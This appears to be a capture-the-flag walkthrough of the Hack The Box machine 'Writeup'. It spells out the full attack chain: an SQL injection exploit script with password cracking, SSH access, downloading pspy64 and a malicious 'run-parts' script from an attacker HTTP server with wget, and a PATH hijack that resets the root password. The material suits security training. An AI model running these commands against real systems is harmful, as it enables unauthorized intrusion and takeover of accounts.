Today, we’re sharing another Hack Challenge Walkthrough box: Writeup and the machine is part of the retired lab, so you can connect to the machine using your HTB VPN and then start to solve the CTF.

The level of the Lab is set : Beginner to intermediate.

Task: Capture the user.txt and root.txt flags.

Pentesting Methodology

Network scanning

• Nmap

Enumeration

• Web Source code

Exploit

• Unauthenticated SQL injection

Privilege Escalation

• PATH Environment

Network Scanning

As we know the victim’s machine IP thus, we can start with Nmap scanning to identify the open ports and services running across it.

nmap -A 10.10.10.138

From this scanning result, we found that port 80 is open where the /writeup/ entry in the robot.txt has been shown. Besides, port 22 is also open for ssh.

Enumeration

As a result, we looked at the victim IP in the web browser and welcomed a web page shown in the image below.

Then we explore the URL below to examine /writeup as enumerated above.

http://10.10.10.138/writeup

It was a simple web page where we didn’t find any remarkable clue, so we were thinking about checking the source code of the page.

Well, thankfully! We found the description of the CMS used to build the website from inside the source code.

Without any delay, we have googled for CMS Made Simple-2019 Exploit and fortunately found the Exploit DB link to exploit the SQL Injection vulnerability.

Exploit

We just downloaded the python script from the ExploitDB and gave ALL permission. When things are set, we run the following command to obtain the credential from inside the database by exploiting unauthorized SQL injection.

python 46635.py -u http://10.10.10.138/writeup/ --crack -w /usr/share/wordlists/rockyou.txt

As a result we found salt value, username, email address, password hashes and its password.

Since we have found the login credential, we can use it to access the ssh shell.

ssh jkr@10.10.10.138

Booom!! We successfully got the host machine shell and found the user.txt file as shown in the below image. Now it was time to obtain the higher privilege shell by escalating the privilege of the user jkr.

Privilege Escalation

It was time to post enumeration to determine the concealed process running on the host machine. We try to enumerate the services running as root that can be abused, and to do this, we have to use pspy64 to identify the services running, because the manual approach failed to identify all processes running in the background.

Therefore, we downloaded the pspy64 script in the host machine inside /tmp directory and assign full permissions then ran it to identify processes running of the machine. 

cd /tmp
wget http://192.168.14.15:8000/pspy64
chmod 777 pspy64
./pspy64

So, we found that a suspicious process was underway, which was executing the following command:

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

We’re trying to break down in order to analyze what’s going on in the current phase.

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Here we saw “sh -c /usr/bin/env” command was running to create an empty environment to set up the PATH variable in which you can observe that “/usr/local/sbin” was at the top which means it will be given the highest priority.

run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

All the scripts in /etc/update-motd.d using run-parts, then stores all output in /run/motd.dynamic.new

Interestingly, we found that the above command was running when jkr connects to ssh to access the server, so we can assume that every time we connect to ssh as jkr, the script will run with the help of the command.

Thus we check the permissions for /usr/local/sbin and note the ownership as root:staff, then we checked for user_id and luckily find that jkr is the member of staff group.

Since /usr/local/sbin is being set as the priority path, hence we can try to write a malicious file inside the /usr/local/sbin/ with a name as run-parts.

So, in our local machine we write a script, to change the password for user root and save it as run-parts,

Then transfer this file on the host machine using HTTP python server.

#!/bin/bash
echo "root:raj@123"|chpasswd
python -m SimpleHTTPServer

Let’s download the malicious script to the host machine inside the /tmp directory and give it full permission to copy it to “/usr /local/sbin” as shown in the image below.

cd /tmp
wget http://10.10.14.15:8000/run-parts
chmod 777 run-parts
cp run-parts /usr/local/sbin

when everything is done then we need to logout and then again login with ssh as jkr so that our malicious script gets execute as said above.

ssh jkr@10.10.10.138
su root
cd /root
cat root.txt

Booom! Booom! We’ve got the root flag, as soon as you connect to ssh again, the running process will run our malicious run-parts script, which will modify the root user password, and then you can switch the user as root and catch the root.txt flag.

Author: Kavish Tyagi is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here